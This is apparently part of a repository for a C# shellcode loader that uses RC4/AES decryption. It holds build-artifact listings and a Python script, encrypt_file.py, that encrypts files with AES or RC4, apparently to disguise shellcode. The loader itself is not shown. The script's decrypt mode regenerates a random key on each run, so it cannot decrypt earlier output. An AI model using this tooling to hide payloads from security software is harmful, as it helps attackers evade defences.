/Shellcode解密加载/obj/Debug/Shellcode解密加载.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | E:\Source Code\C_code\Shellcode解密加载\Shellcode解密加载\bin\Debug\Shellcode解密加载.exe 2 | E:\Source Code\C_code\Shellcode解密加载\Shellcode解密加载\bin\Debug\Shellcode解密加载.pdb 3 | E:\Source Code\C_code\Shellcode解密加载\Shellcode解密加载\obj\Debug\Shellcode解密加载.csproj.AssemblyReference.cache 4 | E:\Source Code\C_code\Shellcode解密加载\Shellcode解密加载\obj\Debug\Shellcode解密加载.csproj.CoreCompileInputs.cache 5 | E:\Source Code\C_code\Shellcode解密加载\Shellcode解密加载\obj\Debug\Shellcode解密加载.exe 6 | E:\Source Code\C_code\Shellcode解密加载\Shellcode解密加载\obj\Debug\Shellcode解密加载.pdb 7 | -------------------------------------------------------------------------------- /Shellcode解密加载/obj/Debug/Shellcode解密加载.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xf555er/SharpShellcodeLoader_Rc4Aes/effe42c436f9499db7eb448bafe463991ef4839c/Shellcode解密加载/obj/Debug/Shellcode解密加载.exe -------------------------------------------------------------------------------- /Shellcode解密加载/obj/Debug/Shellcode解密加载.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xf555er/SharpShellcodeLoader_Rc4Aes/effe42c436f9499db7eb448bafe463991ef4839c/Shellcode解密加载/obj/Debug/Shellcode解密加载.pdb -------------------------------------------------------------------------------- /Shellcode解密加载/obj/Release/.NETFramework,Version=v4.0.AssemblyAttributes.cs: -------------------------------------------------------------------------------- 1 | // 2 | using System; 3 | using System.Reflection; 4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.0", FrameworkDisplayName = ".NET Framework 4")] 5 | -------------------------------------------------------------------------------- /Shellcode解密加载/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xf555er/SharpShellcodeLoader_Rc4Aes/effe42c436f9499db7eb448bafe463991ef4839c/Shellcode解密加载/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /Shellcode解密加载/obj/Release/Shellcode解密加载.csproj.AssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xf555er/SharpShellcodeLoader_Rc4Aes/effe42c436f9499db7eb448bafe463991ef4839c/Shellcode解密加载/obj/Release/Shellcode解密加载.csproj.AssemblyReference.cache -------------------------------------------------------------------------------- /Shellcode解密加载/obj/Release/Shellcode解密加载.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | fdeecec71d762229cb64983ff5a52d1d955c8638 2 | -------------------------------------------------------------------------------- /Shellcode解密加载/obj/Release/Shellcode解密加载.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | E:\Source Code\C_code\Shellcode解密加载\Shellcode解密加载\bin\Release\Shellcode解密加载.exe 2 | E:\Source Code\C_code\Shellcode解密加载\Shellcode解密加载\bin\Release\Shellcode解密加载.pdb 3 | E:\Source Code\C_code\Shellcode解密加载\Shellcode解密加载\obj\Release\Shellcode解密加载.csproj.AssemblyReference.cache 4 | E:\Source Code\C_code\Shellcode解密加载\Shellcode解密加载\obj\Release\Shellcode解密加载.csproj.CoreCompileInputs.cache 5 | E:\Source Code\C_code\Shellcode解密加载\Shellcode解密加载\obj\Release\Shellcode解密加载.exe 6 | E:\Source Code\C_code\Shellcode解密加载\Shellcode解密加载\obj\Release\Shellcode解密加载.pdb 7 | -------------------------------------------------------------------------------- /Shellcode解密加载/obj/Release/Shellcode解密加载.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xf555er/SharpShellcodeLoader_Rc4Aes/effe42c436f9499db7eb448bafe463991ef4839c/Shellcode解密加载/obj/Release/Shellcode解密加载.exe -------------------------------------------------------------------------------- /Shellcode解密加载/obj/Release/Shellcode解密加载.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xf555er/SharpShellcodeLoader_Rc4Aes/effe42c436f9499db7eb448bafe463991ef4839c/Shellcode解密加载/obj/Release/Shellcode解密加载.pdb -------------------------------------------------------------------------------- /encrypt_file.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | 3 | import sys 4 | from Crypto import Random 5 | from Crypto.Cipher import AES 6 | from Crypto.Util.Padding import pad, unpad 7 | from Crypto.Cipher import ARC4 8 | from base64 import b64encode, b64decode 9 | import string 10 | import os 11 | import secrets 12 | 13 | """ 14 | Requirements: 15 | Must have pycryptodome installed. 16 | Install examples: 17 | python3 -m pip install pycryptodome 18 | """ 19 | 20 | # 生成32位的密钥 21 | def generate_key(): 22 | alphabet = string.ascii_letters + string.digits # 包括大小写字母和数字 23 | return ''.join(secrets.choice(alphabet) for i in range(32)) 24 | 25 | # aes加密函数 26 | def aes_encrypt(message, key, key_size=256): 27 | # 对信息进行填充 28 | message = pad(message, AES.block_size, style='pkcs7') 29 | # 生成随机的初始化向量(IV) 30 | iv = Random.new().read(AES.block_size) 31 | # 创建一个新的AES加密对象 32 | cipher = AES.new(key.encode('utf-8'), AES.MODE_CBC, iv) 33 | # 返回加密后的信息,信息的开头是IV 34 | return iv + cipher.encrypt(message) 35 | 36 | # aes解密函数 37 | def aes_decrypt(ciphertext, key): 38 | # 从密文中提取初始化向量(IV) 39 | iv = ciphertext[:AES.block_size] 40 | # 创建一个新的AES解密对象 41 | cipher = AES.new(key.encode('utf-8'), AES.MODE_CBC, iv) 42 | # 使用AES解密密文,并去除填充 43 | plaintext = unpad(cipher.decrypt(ciphertext[AES.block_size:]), AES.block_size, style='pkcs7') 44 | return plaintext 45 | 46 | # aes加密文件 47 | def aes_encrypt_file(key, in_file, out_file): 48 | # 打开并读取输入文件的内容 49 | with open(in_file, 'rb') as fo: 50 | plaintext = fo.read() 51 | # 使用AES加密这些内容 52 | enc = aes_encrypt(plaintext, key) 53 | # 将加密后的内容写入输出文件 54 | with open(out_file, 'wb') as fo: 55 | fo.write(enc) 56 | print(f'[*] Read File Bytes: {len(plaintext)}') 57 | print(f'[*] AES Encrypted File Bytes: {len(enc)}') 58 | print("[*] AES encrypted file written to: " + out_file) 59 | 60 | # aes解密文件 61 | def aes_decrypt_file(key, in_file, out_file): 62 | with open(in_file, 'rb') as fo: 63 | ciphertext = fo.read() 64 | #ciphertext = b64decode(ciphertext) 65 | dec = aes_decrypt(ciphertext, key) 66 | #dec = b64decode(dec) 67 | with open(out_file, 'wb') as fo: 68 | fo.write(dec) 69 | print(f'[*] Read File Bytes: {len(ciphertext)}') 70 | print(f'[*] AES Decrypted File Bytes: {len(dec)}') 71 | print("[*] AES decrypted file written to: " + out_file) 72 | 73 | # rc4加密文件 74 | def rc4_encrypt_file(key, in_file, out_file): 75 | # 打开并读取输入文件的内容 76 | with open(in_file, 'rb') as fo: 77 | plaintext = fo.read() 78 | # 创建一个新的RC4加密对象 79 | cipher = ARC4.new(key.encode('utf-8')) 80 | # 使用RC4加密这些内容 81 | enc = cipher.encrypt(plaintext) 82 | # 将加密后的内容写入输出文件 83 | with open(out_file, 'wb') as fo: 84 | fo.write(enc) 85 | print(f'[*] Read File Bytes: {len(plaintext)}') 86 | print(f'[*] RC4 Encrypted File Bytes: {len(enc)}') 87 | print("[*] RC4 encrypted file written to: " + out_file) 88 | 89 | # rc4解密文件 90 | def rc4_decrypt_file(key, in_file, out_file): 91 | # 打开并读取输入文件的密文内容 92 | with open(in_file, 'rb') as fo: 93 | ciphertext = fo.read() 94 | # 创建一个新的RC4解密对象 95 | cipher = ARC4.new(key.encode('utf-8')) 96 | # 使用RC4进行解密,因为RC4是对称加密算法,所以加密和解密方法相同 97 | dec = cipher.encrypt(ciphertext) 98 | # 将解密后的内容写入输出文件 99 | with open(out_file, 'wb') as fo: 100 | fo.write(dec) 101 | print(f'[*] Read File Bytes: {len(ciphertext)}') 102 | print(f'[*] RC4 Decrypted File Bytes: {len(dec)}') 103 | print("[*] RC4 decrypted file written to: " + out_file) 104 | 105 | 106 | if __name__ == '__main__': 107 | 108 | key = generate_key() 109 | print(f"Generated Key: {key}") 110 | 111 | if len(sys.argv) != 4: 112 | print('Usage: encrypt_file.py ') 113 | else: 114 | mode = sys.argv[1] 115 | operation = sys.argv[2] 116 | input_file = sys.argv[3] 117 | output_file = os.path.join(os.path.dirname(input_file), f"encrypt_{os.path.basename(input_file)}") 118 | 119 | if mode == 'aes' and operation == 'encrypt': 120 | aes_encrypt_file(key, input_file, output_file) 121 | elif mode == 'aes' and operation == 'decrypt': 122 | aes_decrypt_file(key, input_file, output_file) 123 | elif mode == 'rc4' and operation == 'encrypt': 124 | rc4_encrypt_file(key, input_file, output_file) 125 | elif mode == 'rc4' and operation == 'decrypt': 126 | rc4_decrypt_file(key, input_file, output_file) 127 | 128 | --------------------------------------------------------------------------------